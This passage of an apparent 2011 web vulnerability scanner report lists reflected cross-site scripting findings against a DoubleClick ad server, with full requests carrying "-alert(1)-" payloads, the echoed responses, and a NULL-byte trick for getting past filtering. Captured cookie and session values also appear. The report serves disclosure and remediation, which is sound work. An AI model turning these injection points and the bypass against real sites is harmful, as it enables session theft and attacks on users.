Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818; TData=99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|60514|52614|53656|52842|56830|52615|60546|56918|60500|56920|56555|51133|56988|56917|53435|54173|56500|52611|54463|56969|56835|54938|61166|56761|56780; N=2:ef750afea1932931347519ba153fff1c,a07761c4014e52e7e1bc39b6a051a868; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=; eadx=2

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:15 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 26 Mar 2011 20:52:15 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 20-Mar-12 20:37:15 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818|50215^1^1301776635; path=/; expires=Sat, 02-Apr-11 20:37:15 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1301171786^1301173635|16768^1301171786^1301173586|29cb8
b6126af3077
^1301171835^1301173635; path=/; expires=Sat, 26-Mar-11 21:07:15 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|60500|56920|56555|56761|56500|56988|52611|53603|54173|53435|54463|56917|56969|56718|56835|56715; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:0cd73208ac57a723a07d874a21de8895,7a83820d0a0dd8c854eabe6c04f3aee3; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3Mzk6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NTY1MTE6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTU0MDE6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTY3NjE6NTY1MDA6NTY5ODg6NTI2MTE6NTM2MDM6NTQxNzM6NTM0MzU6NTQ0NjM=; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 29-Mar-11 20:37:15 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|
...[SNIP]...

5. Cross-site scripting (reflected)
There are 149 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %005f8f3"-alert(1)-"b8b286ead4a was submitted in the adurl parameter. This input was echoed as 5f8f3"-alert(1)-"b8b286ead4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=%005f8f3"-alert(1)-"b8b286ead4a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6985
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 13:14:51 GMT
Expires: Sat, 26 Mar 2011 13:14:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=%005f8f3"-alert(1)-"b8b286ead4ahttp://ads.networksolutions.com/landing?code=P111C519S512N0B2A1D691E0000V101");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "nev
...[SNIP]...

5.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00962c0"-alert(1)-"a036383781d was submitted in the ai parameter. This input was echoed as 962c0"-alert(1)-"a036383781d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ%00962c0"-alert(1)-"a036383781d&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7005
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 13:14:19 GMT
Expires: Sat, 26 Mar 2011 13:14:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ%00962c0"-alert(1)-"a036383781d&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=http://ads.networksolutions.com/landing?code=P61C151S512N0B2A1D687E0000V100&promo=BCXXX03936");
var fscUrl = url;
va
...[SNIP]...

5.3. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e67df"-alert(1)-"af922d3d5bf was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912e67df"-alert(1)-"af922d3d5bf&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7035
Date: Sat, 26 Mar 2011 13:14:48 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:48 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
BfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912e67df"-alert(1)-"af922d3d5bf&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V100%26promo%3DBCXXX03936");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

5.4. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a362b"-alert(1)-"c0a292ff252 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1a362b"-alert(1)-"c0a292ff252&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7004
Date: Sat, 26 Mar 2011 13:14:28 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:28 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
qLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1a362b"-alert(1)-"c0a292ff252&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP99C519S512N0B2A1D38E0000V109");
var fscUrl = url;
var fscUrlClickT
...[SNIP]...

5.5. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c075c"-alert(1)-"98c9a8f876d was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QAc075c"-alert(1)-"98c9a8f876d&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7074
Date: Sat, 26 Mar 2011 13:14:38 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:38 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Bo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QAc075c"-alert(1)-"98c9a8f876d&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

5.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e51"-alert(1)-"b2b22d2d3e9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lc1e51"-alert(1)-"b2b22d2d3e9&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7040
Date: Sat, 26 Mar 2011 13:14:07 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 13:14:07 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
